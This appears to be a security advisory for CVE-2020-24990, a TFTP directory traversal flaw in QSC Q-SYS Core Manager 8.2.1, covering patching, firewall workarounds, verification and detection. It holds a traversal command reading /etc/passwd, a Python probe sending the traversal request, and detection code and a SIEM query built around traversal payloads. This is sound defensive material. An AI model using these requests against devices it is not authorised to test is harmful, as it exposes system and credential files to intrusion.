CVE-2020-24990

CVSS v3 base score: 7.5 HIGH (network-reachable, no privileges or user interaction required; impact is confidentiality only)

📋 TL;DR

CVE-2020-24990 is a directory traversal (CWE-22) vulnerability in the TFTP service of QSC Q-SYS Core Manager 8.2.1. An unauthenticated remote attacker who can reach UDP port 69 sends a TFTP read request (RRQ) whose filename contains ../ sequences and retrieves arbitrary operating-system files from the Core, as demonstrated by reading /etc/passwd and /proc/version. The flaw is read-only: it discloses files but does not by itself write to or execute anything on the device.

💻 Affected Systems

Products:
  • QSC Q-SYS Core Manager
Versions: 8.2.1
Operating Systems: Linux-based Q-SYS OS
Default Config Vulnerable: ⚠️ Yes
Notes: TFTP service runs on UDP port 69 by default in vulnerable configurations.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Disclosure of configuration files, password hashes or stored credentials that an attacker chains into full compromise of the Core and of the AV/control network it manages.

🟠

Likely Case

Information disclosure of system files, potential credential harvesting, and reconnaissance for further attacks.

🟢

If Mitigated

Limited impact with proper network segmentation and access controls preventing unauthorized TFTP access.

🌐 Internet-Facing: HIGH - The vulnerability is unauthenticated and exploitable over network, making internet-facing systems particularly vulnerable.
🏢 Internal Only: MEDIUM - Internal systems are still vulnerable but may have additional network controls reducing exposure.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only a standard TFTP client and a traversal path such as ../../../../etc/passwd; no authentication, no user interaction and no special tooling.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 8.2.2 or later

Vendor Advisory: https://q-syshelp.qsc.com/Content/Core_Manager/CoreManager_Overview.htm

Restart Required: Yes

Instructions:

1. Download the latest Q-SYS Core Manager software from the QSC website.
2. Back up the current configuration.
3. Install the updated version.
4. Restart the system.
5. Verify that the TFTP service no longer serves files outside its root (see How to Verify below).

🔧 Temporary Workarounds

Block TFTP Access

linux

Restrict network access to the TFTP service (UDP port 69). The Q-SYS Core is an appliance, so the host-firewall commands below apply to a Linux gateway or jump host placed in front of it, not to the Core itself; on the network boundary, implement the same rule on the site firewall. Dropping all port-69 traffic also blocks legitimate TFTP use, so add an allow rule for the management host ahead of the drop if TFTP is needed operationally.

iptables -A INPUT -p udp --dport 69 -j DROP
ufw deny 69/udp

Disable TFTP Service

linux

Disable the TFTP service if it is not required for operations. The unit name tftpd is generic (the package is often tftpd-hpa or in.tftpd) and the commands assume shell access to the host running the listener; a Q-SYS Core normally exposes no such shell, in which case blocking the port at the network is the practical control.

systemctl disable --now tftpd   # disable at boot and stop it now
service tftpd stop              # SysV equivalent

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate Q-SYS systems from untrusted networks
  • Deploy network-based intrusion detection to monitor for TFTP directory traversal attempts

🔍 How to Verify

Check if Vulnerable:

Send a TFTP read request with a directory traversal payload (tftp-hpa syntax; older clients take the same get command interactively): tftp <target_ip> -c get ../../../../etc/passwd testfile. If testfile is created and contains account entries such as root:x:0:0:, the Core is vulnerable.

Check Version:

Check the Q-SYS Core Manager version in the web interface. The page also lists a shell check, cat /etc/qsc_version, which only applies where shell access to the Core is available.

Verify Fix Applied:

Repeat the same traversal request after patching. A fixed server answers the RRQ with a TFTP ERROR packet (code 1 "File not found" or code 2 "Access violation") instead of DATA blocks, and the local testfile stays empty or is not created.
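The check above can be scripted against the raw protocol rather than a TFTP client, which makes the verdict unambiguous: a DATA packet (opcode 3) in reply to the traversal RRQ means the file was opened, an ERROR packet (opcode 5) means it was refused. The following is an added example, not QSC's code or the public PoC; the target address 192.0.2.10 is a placeholder and the traversal path is the one from the advisory.

```python
"""Probe a TFTP server for CVE-2020-24990 style traversal (RFC 1350 framing).

Added example, not vendor code. Sends one Read Request for a traversal
path and classifies the first datagram that comes back; if the server
starts sending DATA the transfer is cancelled so no file is pulled in full.
"""
import socket
import struct

OP_RRQ, OP_DATA, OP_ERROR = 1, 3, 5


def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """RRQ = opcode (2 bytes) | filename | NUL | mode | NUL."""
    return struct.pack("!H", OP_RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def classify_response(packet: bytes) -> dict:
    """Interpret the first reply.

    DATA (opcode 3) means the server opened the requested path -> vulnerable.
    ERROR (opcode 5) means it refused -> not exploitable via this path.
    """
    if len(packet) < 4:
        return {"result": "malformed", "detail": packet.hex()}
    opcode, = struct.unpack("!H", packet[:2])
    if opcode == OP_DATA:
        block, = struct.unpack("!H", packet[2:4])
        return {"result": "vulnerable", "block": block, "data": packet[4:]}
    if opcode == OP_ERROR:
        code, = struct.unpack("!H", packet[2:4])
        msg = packet[4:].split(b"\x00", 1)[0].decode(errors="replace")
        return {"result": "refused", "error_code": code, "error_msg": msg}
    return {"result": "unexpected", "opcode": opcode}


def probe(host: str, path: str = "../../../../etc/passwd",
          port: int = 69, timeout: float = 3.0) -> dict:
    """Send one RRQ to host:port and classify the reply (network call)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_rrq(path), (host, port))
        # The server answers from a fresh ephemeral port, so reply to `peer`, not port 69.
        packet, peer = sock.recvfrom(1024)
        verdict = classify_response(packet)
        if verdict["result"] == "vulnerable":
            # Cancel the transfer: ERROR code 0 (not defined) with a short message.
            sock.sendto(struct.pack("!HH", OP_ERROR, 0) + b"cancelled\x00", peer)
        return verdict
    except socket.timeout:
        return {"result": "no_response"}
    finally:
        sock.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # placeholder address
    v = probe(target)
    print(v["result"], v.get("error_msg", ""), v.get("data", b"")[:80])
```

Run it as `python3 probe.py <target_ip>` from a host that can reach UDP/69. A "vulnerable" verdict with the first DATA block starting with root:x:0:0: is conclusive; "refused" with error code 1 or 2 is the expected post-patch behaviour; "no_response" usually means the port is filtered or the service is off, which is itself a valid mitigation check.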

📡 Detection & Monitoring

Log Indicators:

  • TFTP server logs (where the Core exposes them) showing read requests whose filename contains ../ or ..\
  • Failed file-access attempts in system logs

Network Indicators:

  • TFTP traffic to UDP port 69 with ../ in packet payloads
  • Unusual TFTP GET requests from external sources

SIEM Query:

dest_port=69 AND protocol=udp AND (payload CONTAINS "../" OR payload CONTAINS "..\")

The request carrying the traversal path is sent to UDP port 69; the server's DATA reply comes from a new ephemeral port, so a filter on source port 69 would miss the request itself. Substring matching also misses variants such as ..// or mixed separators, so a parser-based rule on the RRQ filename is preferable where the sensor supports it.
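A detection that parses the TFTP request header instead of grepping for "../" catches the backslash and doubled-separator variants as well. The following is an added example (not from QSC or any IDS vendor) that decodes RRQ/WRQ packets destined for UDP/69 from a list of (src, dst, dport, payload) records and flags any filename with a .. segment or an absolute path; the sample traffic is constructed, not a real capture.

```python
"""Flag TFTP read/write requests that attempt directory traversal.

Added detection example, not vendor code. Parses the RFC 1350 request
header (opcode | filename NUL | mode NUL) so "..\\", "..//" and
absolute paths are caught, not only the literal "../" substring.
"""
import re
import struct
from typing import Iterable, List, Optional, Tuple

OPCODES = {1: "RRQ", 2: "WRQ"}


def parse_request(payload: bytes) -> Optional[dict]:
    """Return {op, filename, mode} for an RRQ/WRQ; None for DATA/ACK/ERROR or junk."""
    if len(payload) < 4:
        return None
    opcode, = struct.unpack("!H", payload[:2])
    if opcode not in OPCODES:
        return None
    parts = payload[2:].split(b"\x00")
    if len(parts) < 3:  # need filename NUL mode NUL
        return None
    return {
        "op": OPCODES[opcode],
        "filename": parts[0].decode("latin-1"),
        "mode": parts[1].decode("latin-1").lower(),
    }


def is_traversal(filename: str) -> bool:
    """True if the name escapes the server root: a '..' segment with either
    separator, or an absolute path."""
    if filename.startswith(("/", "\\")):
        return True
    segments = re.split(r"[\\/]+", filename)
    return any(seg == ".." for seg in segments)


Record = Tuple[str, str, int, bytes]  # (src_ip, dst_ip, dst_port, udp_payload)


def scan(records: Iterable[Record]) -> List[dict]:
    """Return one alert per traversal request addressed to the TFTP port."""
    alerts = []
    for src, dst, dport, payload in records:
        if dport != 69:  # requests go TO 69; DATA/ACK flow on ephemeral ports
            continue
        req = parse_request(payload)
        if req and is_traversal(req["filename"]):
            alerts.append({"src": src, "dst": dst, "op": req["op"], "path": req["filename"]})
    return alerts


# Constructed sample traffic (not a real capture).
SAMPLE: List[Record] = [
    ("10.0.0.5", "10.0.0.20", 69, b"\x00\x01../../../../etc/passwd\x00octet\x00"),
    ("10.0.0.5", "10.0.0.20", 69, b"\x00\x01..\\..\\..\\proc\\version\x00netascii\x00"),
    ("10.0.0.7", "10.0.0.20", 69, b"\x00\x01firmware.bin\x00octet\x00"),  # benign
    ("10.0.0.20", "10.0.0.5", 51000, b"\x00\x03\x00\x01root:x:0:0:"),  # DATA reply, ignored
    ("10.0.0.9", "10.0.0.20", 69, b"\x00\x02/etc/shadow\x00octet\x00"),  # WRQ, absolute path
]

if __name__ == "__main__":
    for a in scan(SAMPLE):
        print(f"ALERT {a['op']} {a['src']} -> {a['dst']} path={a['path']!r}")
```

Feeding it the sample yields three alerts (the two traversal reads and the absolute-path write) and ignores both the benign firmware read and the DATA reply on the ephemeral port. The same parse-then-normalize logic is what a TFTP server should apply before opening a file, which is the root-cause fix for this class of bug.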

🔗 References
